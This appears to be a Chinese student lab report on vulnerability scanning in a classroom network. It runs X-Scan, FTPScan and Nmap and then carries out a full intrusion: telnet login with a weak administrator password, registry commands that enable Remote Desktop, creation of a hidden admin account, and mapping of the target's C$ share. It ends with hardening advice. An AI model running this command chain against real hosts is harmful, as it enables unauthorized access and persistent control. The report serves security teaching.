網絡安全實驗3 漏洞掃描

讚賞碼 & 聯繫方式 & 個人閒話

【實驗名稱】漏洞掃描

 

【實驗目的】

1.熟悉X-Scan工具的使用方法;

2.熟悉FTPScan工具的使用方法;

3.會使用工具查找主機漏洞

4.學會對弱口令的利用

5.瞭解開啓主機默認共享以及在命令提示下開啓服務的方法

6.通過實驗瞭解如何提高主機的安全性

 

【實驗原理】

漏洞掃描是一種網絡安全掃描技術,它基於局域網或Internet遠程檢測目標網絡或主機安全性。通過漏洞掃描,系統管理員能夠發現所維護的Web服務器的各種TCP/IP端口的分配、開放的服務、Web服務軟件版本和這些服務及軟件呈現在Internet上的安全漏洞。漏洞掃描技術採用積極的、非破壞性的辦法來檢驗系統是否含有安全漏洞。網絡安全掃描技術與防火牆、安全監控系統互相配合使用,能夠爲網絡提供很高的安全性。

漏洞掃描分爲利用漏洞庫的漏洞掃描和利用模擬攻擊的漏洞掃描。利用漏洞庫的漏洞掃描包括:CGI漏洞掃描、POP3漏洞掃描、FTP漏洞掃描、SSH漏洞掃描和HTTP漏洞掃描等。利用模擬攻擊的漏洞掃描包括:Unicode遍歷目錄漏洞探測、FTP弱口令探測、OPENRelay郵件轉發漏洞探測等。

修改註冊表啓用遠程桌面的方法
  使用註冊表開啓Windows 2003系統下遠程桌面服務的一個最關鍵的註冊表鍵值爲“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server”,在該鍵值下數值名稱爲“fDenyTSConnections”的這一項中可以看到它的數值數據爲1或0,數值爲1的時候關閉遠程桌面服務,數值爲0的時候開啓遠程桌面服務。只要更改這個關鍵的註冊表鍵值數據值就可以達到實現開啓遠程桌面服務的目的了,在Windows 2003系統中使用“reg”命令即可以做到這一點,方法爲在命提示符下執行執行:“reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"” 查看“fDenyTSConnections”鍵值數據爲“0x1”,這個是十六進制數的1,上面提到,數據爲1則沒有開啓遠程桌面服務,我們要做的就是把“0x1”改成“0x0”。直接用“reg add”命令是不行的,必須把原來鍵值刪掉再添加,在命令提示符下執行:“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\ CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections ”。執行後會詢問“是否要刪除註冊表值 fDenyTSConnections 嗎”,確定後再執行:“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”提示操作成功完成,這樣就把“fDenyTSConnections”的值改爲"0x0"了,之後再使用遠程桌面連接目標主機,發現已經可以成功連接上了。

圖2-2-1 實驗流程

 

【實驗內容】

綜合掃描與安全評估

一.開放服務掃描

(1)設置掃描範圍

本機進入實驗平臺,單擊工具欄“X-Scan”按鈕,啓動X-Scan。依次選擇菜單欄“設置”|“掃描參數”菜單項,打開掃描參數對話框。在“檢測範圍”參數中指定掃描IP的範圍,在“指定IP範圍”輸入要檢測同組主機域名或IP,也可以對多個IP進行檢測,例如“202.0.0.68-202.0.0.160”,這樣就對這個網段的主機進行檢測。這裏對單一的IP進行掃描,輸入同組主機IP。這裏我們同組主機IP設爲:169.254.30.66。

Step1:首先查看我們本機虛擬機的IP地址爲:169.254.159.202

標題

Step2:指定我們要掃描的同組主機的IP地址:169.254.30.66

標題

 

(2)全局設置

本機在“全局設置”的“掃描模塊”選項裏,可以看到待掃描的各種選項,我們先只對開放服務進行掃描,選擇“開放服務”選項。“併發掃描”選項中可設置線程和併發主機數量,這裏選擇默認設置。“其他設置”選項中,如果對單一主機進行掃描時,通常選擇“無條件掃描”選項。選擇此選項時X-Scan會對目標進行詳細檢測,這樣結果會比較詳細也會更加準確,但掃描時間會延長。

當對方禁止ICMP回顯請求時,如果設置了“跳過沒有響應的主機”選項,X-Scan會自動跳過該主機,自動檢測下一臺主機。

Step1:只選擇“開放服務”選項。

標題

Step2:其他設置”選項中,選擇“無條件掃描”選項。

標題

(3)插件設置

在“端口相關設置”選項中可以自定義一些需要檢測的端口。檢測方式有“TCP”、“SYN”兩種,TCP方式容易被對方發現,準確性要高一些;SYN則相反。

Step1:檢測方式選擇TCP。

標題

(4)開始掃描

掃描前請同組主機打開協議分析器,進入“設置”|“定義過濾器”|“選擇協議過濾”,設置過濾協議爲“HTTP”、“FTP”,單擊“新建捕獲窗口”按鈕,點擊“選擇過濾器”按鈕,確定過濾信息。在新建捕獲窗口工具欄中點擊“開始捕獲數據包”按鈕,開始捕獲數據包。

Step1:過濾器設置過濾協議爲“HTTP”、“FTP”。

 

(5)結束掃描

本機在進行掃描過程中如果檢測到漏洞的話,可在“漏洞信息”中查看。掃描結束以後自動彈出檢測報告,包括漏洞的信息,以便我們對同組主機進行詳細的分析。

報告保存在X-Scan文件夾下的log目錄中(D:\ExpNIC\Common\Tools\X-Scan)。報告中可以查看同組主機中開放的端口以及提供的服務。

 

(6)分析掃描結果

1、本機分析掃描器生成的掃描結果,對存在的漏洞進行風險評估。

本機執行上述方法掃描同組主機,得到的掃描報告(部分)如下。

 

X-Scan 檢測報告

本報表列出了被檢測主機的詳細漏洞信息, 請根據提示信息或鏈接內容進行相應修補. 歡迎參加X-Scan腳本翻譯項目

 

掃描時間

2019-3-26 10:15:40 - 2019-3-26 10:16:03

 

 

檢測結果

存活主機

1

漏洞數量

0

警告數量

0

提示數量

7

 

主機列表

主機

檢測結果

169.254.30.66

發現安全提示

主機摘要 - OS: Unknown OS; PORT/TCP: 21, 23, 80, 135, 139, 445, 1025

 

主機分析: 169.254.30.66

主機地址

端口/服務

服務漏洞

169.254.30.66

netbios-ssn (139/tcp)

發現安全提示

169.254.30.66

telnet (23/tcp)

發現安全提示

169.254.30.66

www (80/tcp)

發現安全提示

169.254.30.66

microsoft-ds (445/tcp)

發現安全提示

169.254.30.66

ftp (21/tcp)

發現安全提示

169.254.30.66

epmap (135/tcp)

發現安全提示

169.254.30.66

network blackjack (1025/tcp)

發現安全提示

 

安全漏洞及解決方案: 169.254.30.66

類型

端口/服務

安全漏洞及解決方案

提示

netbios-ssn (139/tcp)

開放服務

"netbios-ssn"服務可能運行於該端口.

BANNER
信息:

83 .
NESSUS_ID :
10330

提示

telnet (23/tcp)

開放服務

"telnet"服務可能運行於該端口.

BANNER
信息:

0d 0a b2 bb d4 ca d0 ed b8 fc b6 e0 b5 bd 20 74 ............ t
65 6c 6e 65 74 20 b7 fe ce f1 c6 f7 b5 c4 c1 ac elnet ..........
bd d3 a1 a3 c7 eb c9 d4 ba f2 d4 d9 ca d4 a1 a3 ................
NESSUS_ID :
10330

……

……

……

 

由掃描報告可以看出,目標主機在公共服務上並沒有發現安全漏洞,只是有一些安全提示。該主機在netbios-ssn (139/tcp)、telnet (23/tcp)、www (80/tcp)、microsoft-ds (445/tcp)、ftp (21/tcp)、epmap (135/tcp)、network blackjack (1025/tcp)這些端口上提供的服務都有隱藏風險,需要注意。

 

2、請同組主機停止協議分析器,觀察協議分析器中本機與同組主機的會話情況。

數據包捕獲結果如下圖所示,這裏展示的其實是同組主機169.254.30.66使用上述相同方法掃描本機169.254.159.202時,本機捕獲到的結果。這個結果和對方捕捉到本機的掃描結果是基本相同的。在掃描結果中可以看出同組主機向本機發送來的請求與迴應。

在得到的監聽結果中會發現會話交互圖上有的命令和操作會出現亂碼現象,對於這個實驗指導上進行了解釋:這是由於開放服務掃描攜帶的信息具有隨機性和不可見性,是正常現象。

 

二.漏洞檢測腳本掃描

(1)本機對掃描器進行設置

Step1:在“全局設置”|“掃描模塊”中只選擇“漏洞檢測腳本”,其它設置與步驟一相同。

(2)開始掃描

Step1:同組主機關閉協議分析器“捕獲窗口”,設置協議分析器的捕獲緩衝區大小爲8M,具體操作方法如下:單擊菜單欄“設置”,選擇“捕獲緩衝區大小”,選擇“8M”。

Step2:定義過濾器協議過濾,選擇協議“FTP Control”和“FTP Data”。

Step3:新建“捕獲窗口”,選擇此前設置的過濾器,開始捕獲。

Step4:本機對同組主機進行掃描。

 

(3)結束掃描

1、本機對掃描器生成的掃描結果進行分析,並根據掃描結果判斷X-Scan對同組主機進行了哪些類別的FTP掃描行爲。

本機執行上述方法掃描同組主機,得到的掃描報告如下(因爲報告太長,此處指貼出一部分)。

X-Scan 檢測報告

本報表列出了被檢測主機的詳細漏洞信息, 請根據提示信息或鏈接內容進行相應修補. 歡迎參加X-Scan腳本翻譯項目

 

掃描時間

2019-3-26 10:31:09 - 2019-3-26 10:34:26

 

 

檢測結果

存活主機

1

漏洞數量

1

警告數量

1

提示數量

18

 

主機列表

主機

檢測結果

169.254.30.66

發現安全漏洞

主機摘要 - OS: Unknown OS; PORT/TCP:

 

主機分析: 169.254.30.66

主機地址

端口/服務

服務漏洞

169.254.30.66

microsoft-ds (445/tcp)

發現安全漏洞

169.254.30.66

netbios-ssn (139/tcp)

發現安全提示

169.254.30.66

epmap (135/tcp)

發現安全提示

169.254.30.66

netbios-ns (137/udp)

發現安全提示

169.254.30.66

ftp (21/tcp)

發現安全警告

169.254.30.66

DCE/12345778-1234-abcd-ef00-0123456789ac (1025/tcp)

發現安全提示

169.254.30.66

http (80/tcp)

發現安全提示

169.254.30.66

DCE/82ad4280-036b-11cf-972c-00aa006887b0 (1027/tcp)

發現安全提示

169.254.30.66

DCE/12345678-1234-abcd-ef00-0123456789ab (1025/tcp)

發現安全提示

169.254.30.66

telnet (23/tcp)

發現安全提示

 

安全漏洞及解決方案: 169.254.30.66

類型

端口/服務

安全漏洞及解決方案

漏洞

microsoft-ds (445/tcp)

Vulnerability in SMB Could Allow Remote Code Execution (896422) - Network Check


The remote version of Windows contains a flaw in the Server Message
Block (SMB) implementation which may allow an attacker to execute arbitrary
code on the remote host.

Solution :
http://www.microsoft.com/technet/security/bulletin/ms05-027.mspx
Risk factor : High
CVE_ID :
CAN-2005-1208
BUGTRAQ_ID : 13942
NESSUS_ID : 18502

……

……

……

警告

ftp (21/tcp)

Anonymous FTP enabled


This FTP service allows anonymous logins. If you do not want to share data
with anyone you do not know, then you should deactivate the anonymous account,
since it may only cause troubles.



Risk factor : Low
CVE_ID :
CAN-1999-0497
NESSUS_ID : 10079

提示

ftp (21/tcp)

FTP服務的版本和類型

通過登陸目標服務器並經過緩衝器接收可查出FTP服務的類型和版本。這些註冊過的標識信息將給予潛在的攻擊者們關於他們要攻擊的系統的額外信息。版本和類型會在可能的地方被泄露。

解決方案:將這些註冊過的標識信息轉變爲普通類別的信息。。

風險等級:低
___________________________________________________________________

Remote FTP server banner :
220 Microsoft FTP Service

NESSUS_ID :
10092

……

……

……

 

從報告表上可以看出,目標主機有microsoft-ds (445/tcp)安全漏洞。遠程版本的Windows包含服務器消息塊(SMB)實現中的缺陷,可能允許攻擊者在遠程主機上執行任意代碼。並且X-Scan對同組主機進行了FTP服務匿名登錄和FTP服務版本和類型的掃描。這兩者都是值得注意的,如果我們不想共享數據與不認識的任何人,應該停用匿名帳戶,因爲它可能只會引起麻煩。同樣的,通過登陸目標服務器並經過緩衝器接收可查出FTP服務的類型和版本。這些註冊過的標識信息將給予潛在的攻擊者們關於他們要攻擊的系統的額外信息。版本和類型會在可能的地方被泄露。

 

2、同組主機停止協議分析器並觀察兩機會話狀況。

數據包捕獲結果如下圖所示。同樣的,這裏展示的其實是同組主機169.254.30.66使用上述相同方法掃描本機169.254.159.202時,本機捕獲到的結果。這個結果和對方捕捉到本機的掃描結果是基本相同的。在掃描結果中可以看出同組主機向本機發送來的請求與迴應。

 

三.弱口令掃描

本步驟由學生自行操作FTPScan對同組主機進行FTP弱口令掃描,對FTPScan的使用格式爲:

ftpscan.exe 同組主機IP地址 100(100爲線程數,可自選參數)。掃描結果保存在D:\ExpNIC\Common\Tools\FtpScan\ftpscan.txt中。

Step1:輸入命令ftpscan.exe 169.254.30.66 100,可以看到如下的執行結果。

執行結束:

打開D:\ExpNIC\Common\Tools\FtpScan\ftpscan.txt,我們可以看到掃描出的弱口令,即簡單的用戶名及對應的口令。

我們可以利用得到的弱口令登陸目的主機,進行任意行爲。

 

模擬攻擊方法

一. 初步掃描

(1)主機A點擊工具欄“Nmap”按鈕,啓動Nmap工具,輸入命令:nmap -T4 -A -v -PE -PS22,25,80 -PA21,23,80,3389 主機B的IP地址,開始掃描。

(2)主機A分析掃描結果,從掃描結果中可以瞭解到主機B開放了 135/TCP、139/TCP、445/TCP  端口,使用的是  Windows 操作系統,確定具有攻擊價值。

掃描的部分結果如下:

 

二. 進一步掃描

(1)主機A點擊工具欄“X-Scan”按鈕啓動X-Scan,點擊菜單欄中的“設置”按鈕,在彈出菜單中點擊“掃描參數”,在“檢測範圍”中填寫主機B的IP,展開左側樹狀接口中的“全局設置”在“掃描模塊”選項中分別勾選“開放服務”、“NT-Server弱口令”、“NetBios信息”三個選項,其它選項爲空,點擊“確定”按鈕,完成掃描參數設定。

Step1:設定目標主機IP地址。

Step2:掃描模塊設置

 

(2)主機A點擊開始進行掃描。掃描結束後,自動彈出檢測報告。主機A分析掃描結果,主機B開放了23端口,可以進行telnet連接。在139端口中的NetBios信息裏可以看到主機B的賬戶信息,並且發現了存在弱口令漏洞的test賬戶信息,賬戶類型爲 管理員(Administrator) 密碼爲 1234 

 

X-Scan 檢測報告

本報表列出了被檢測主機的詳細漏洞信息, 請根據提示信息或鏈接內容進行相應修補. 歡迎參加X-Scan腳本翻譯項目

 

掃描時間

2019-3-26 11:42:39 - 2019-3-26 11:43:18

 

 

檢測結果

存活主機

1

漏洞數量

1

警告數量

7

提示數量

8

 

主機列表

主機

檢測結果

192.168.245.128

發現安全漏洞

主機摘要 - OS: Windows 2003; PORT/TCP: 21, 23, 80, 135, 139, 445, 1025, 1027

 

 

主機分析: 192.168.245.128

主機地址

端口/服務

服務漏洞

192.168.245.128

netbios-ssn (139/tcp)

發現安全漏洞

192.168.245.128

www (80/tcp)

發現安全提示

192.168.245.128

microsoft-ds (445/tcp)

發現安全提示

192.168.245.128

ftp (21/tcp)

發現安全提示

192.168.245.128

telnet (23/tcp)

發現安全提示

192.168.245.128

network blackjack (1025/tcp)

發現安全提示

192.168.245.128

epmap (135/tcp)

發現安全提示

192.168.245.128

unknown (1027/tcp)

發現安全提示

 

安全漏洞及解決方案: 192.168.245.128

類型

端口/服務

安全漏洞及解決方案

漏洞

netbios-ssn (139/tcp)

NT-Server弱口令

NT-Server弱口令: "test/1234", 帳戶類型: 管理員(Administrator)

 

 

三. 開啓遠程桌面服務

1.主機A嘗試使用“遠程桌面”遠程登錄主機B:

主機A點擊工具欄中“遠程桌面”按鈕,打開遠程桌面連接,嘗試登錄主機B,在遠程桌面中輸入主機B的IP,點擊“連接”按鈕,由於主機B沒有開啓遠程桌面的服務,結果出現了“客戶端無法連接到遠程計算機”的提示,遠程登錄失敗。如圖所示:

 

2.主機A使用telnet登錄主機B:

主機A依次點擊“開始”|“運行”|“cmd”進入命令行,在命令行輸入“telnet 主機B的IP”,在彈出提示中輸入“n”。

在彈出的telnet歡迎界面中輸入前面步驟中已經掃描出的用戶名和密碼:

若登錄成功則出現如下提示:

 

3.通過修改註冊表開啓主機B遠程桌面:

主機A登錄成功後在命令提示符下執行“reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\Terminal Server"”查看執行結果,fDenyTSConnections的值爲  REG_DWORD 0x1   。如圖所示:

主機A在命令提示符下執行“reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections”,刪除該鍵值: 

主機A新建一個fDenyTSConnections值爲0的註冊表項,在命令提示符下執行“reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0”確定,操作成功:

主機A確定修改是否成功,在命令提示符下再次執行  reg query "HKEY_LOCAL_MACHINE \SYSTEM\CurrentControlSet\Control\Terminal Server" 命令,查看“fDenyTSConnections”的值,“fDenyTSConnections”的值爲   REG_DWORD 0x0  
  主機A再次使用遠程桌面連接主機B,連接是否成功 是 (是/否)。

 

四. 建立新用戶

使用當前獲得的賬戶登錄主機B並對其進行操作難免會被察覺,所以主機A需要建立自己的賬戶,方便以後對主機B的控制。

(1)主機A再次使用“test”賬戶用“telnet”命令登錄主機B,並在命令提示符下執行“net user myadmin 1234 /add”,“myadmin”爲用戶名,“1234”爲密碼:

(2)主機A將myadmin用戶添加到administrators組中,在命令提示符下執行“net localgroup administrators myadmin /add”。

(3)主機A使用“myadmin”賬戶遠程桌面登錄主機B,查看效果。

可以成功登陸,界面和用test賬戶登陸時一樣。

 

五. 添加磁盤映射

爲了方便以後對主機B的磁盤文件進行操作,主機A需要將主機B的磁盤映射至本機上。

(1)主機A使用“myadmin”賬戶telnet登錄主機B,在命令提示符下輸入“net share c$=c: /grant:myadmin,full”。將主機B中的C盤映射爲c$,並賦予完全控制權限,如圖2-2-10所示:

(2)主機A退出telnent,並與主機B建立ipc連接,主機A在命令提示符下輸入“net use \\主機B的IP\ipc$ "1234" /user:"myadmin"”如圖2-2-11所示:

「注」刪除ipc連接使用命令“net use \\主機B的IP\ipc$ /del”命令。

(3)主機A繼續執行命令“net use y: \\主機B的IP\c$”將主機B開放的默認共享C盤映射爲自己的本地磁盤Y,如圖2-2-12所示,這樣,操作自己的Y盤就是操作主機B的C盤。

「注」斷開映射使用“net use y: /del”命令。建立磁盤映射必須先建立ipc連接,要映射成的磁盤必須是主機A本地不存在的盤符,例如,本地磁盤已經存在D盤,就不能再將目標主機的某個磁盤映射成主機A的D盤了。

(4)主機A打開“我的電腦”查看新增加的網絡驅動器Y盤,並嘗試對Y盤的文件進行增、刪、改操作。

可以看到,映射成功!

 

思考問題

1、闡述提高主機安全性的方法。

(1)使用安全係數高的密碼。提高安全性的最簡單有效的方法之一就是使用一個不會輕易被暴力破解或者輕易被猜到的密碼。

(2)做好邊界防護。並不是所有的安全問題都發生在系統桌面上。使用外部防火牆/路由器來幫助保護計算機是一個極爲有效的方法。

(3)升級軟件。在很多情況下,在安裝部署生產性應用軟件之前,對系統進行補丁測試工作是至關重要的,最終安全補丁必須安裝到系統中。

(4)關閉沒有使用的服務。多數情況下,很多計算機用戶甚至不知道他們的系統上運行着哪些可以通過網絡訪問的服務,這是一個非常危險的情況。

(5)使用數據加密。對於那些有安全意識的計算機用戶或系統管理員來說,有不同級別的數據加密範圍可以使用,用戶根據需要選擇正確級別的加密通常是根據具體情況來決定的。

(6)通過備份保護數據。備份數據,可以保護用戶在面對災難的時候把損失降到最低的重要方法之一。

(7)加密敏感通信。針對電子郵件的支持OpenPGP協議的軟件,針對即時通信客戶端的Off The Record插件。

(8)不要信任外部網絡。

(9)使用不間斷電源支持。

(10)監控系統的安全是否被威脅和侵入。用戶應該搭建起一些監控程序來確保可疑事件可以迅速引起注意,並能夠判定破壞者是安全入侵還是安全威脅。

 

2、尋找攻擊目標的一般方法有哪些(至少說出三種)。

(1)如果是一個網站,可以通過Whois域名查詢或Whereisip等軟件來得到它們的IP地址;還可以通過ping命令,查詢某個域名的IP地址;Windows系統下還可以通過使用路由跟蹤命令tracert找到某個目標的IP地址。

(2)如果攻擊者知道目標所在地區的大概位置,以及目標使用的IPS名稱,就可以通過搜索引擎得到這個區域所對應的IPS分配的整個IP地址段。他們還可以到負責分配某個區域IP地址的網站,例如http://www.apnic.net(負責亞洲地區IP地址分配的組織APNIC的網站),在這個網站中,就可以查詢到我國電信、鐵通和網通的IP地址分配表。

(3)攻擊者可以製作一個釣魚網站,然後以誘騙網絡用戶的方式來獲得普通用戶的IP地址。

(4)攻擊者也可以利用即時聊天軟件,如QQ等,然後使用如顯IP的QQ外掛就可以知道與他聊天的任何一個好友所使用的IP地址。

(5)現在,攻擊者更喜歡用社會工程方式來得到某個機構或個人的IP地址。還可以通過向其他黑客購買的方式得到。

 

【小結或討論】

實驗一主要是讓我們熟悉X-Scan、FTPScan工具的使用方法。實驗二先是使用X-Scan工具查找主機漏洞,接着開啓遠程桌面服務,進入目的主機。甚至是建立新用戶和添加磁盤映射。

這次可以說完成了一個簡單卻完整的攻擊流程,也讓我認識到當口令使用簡單的數字和字母組合時,非常容易被破解,這是極爲危險的。而且像Telnet和FTP這種常見的問題服務,假如用戶的計算機不需要運行它們的話,應該立即關閉它們。這次實驗二就是發現目的主機打開了登陸服務,並且利用X-Scan工具找到了弱口令漏洞。利用test/1234這種簡單的賬號密碼就登入了目的主機。而且我們,也就是攻擊者,可以很順利地添加新的管理員賬戶,從而更加隱蔽地控制這臺主機。

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章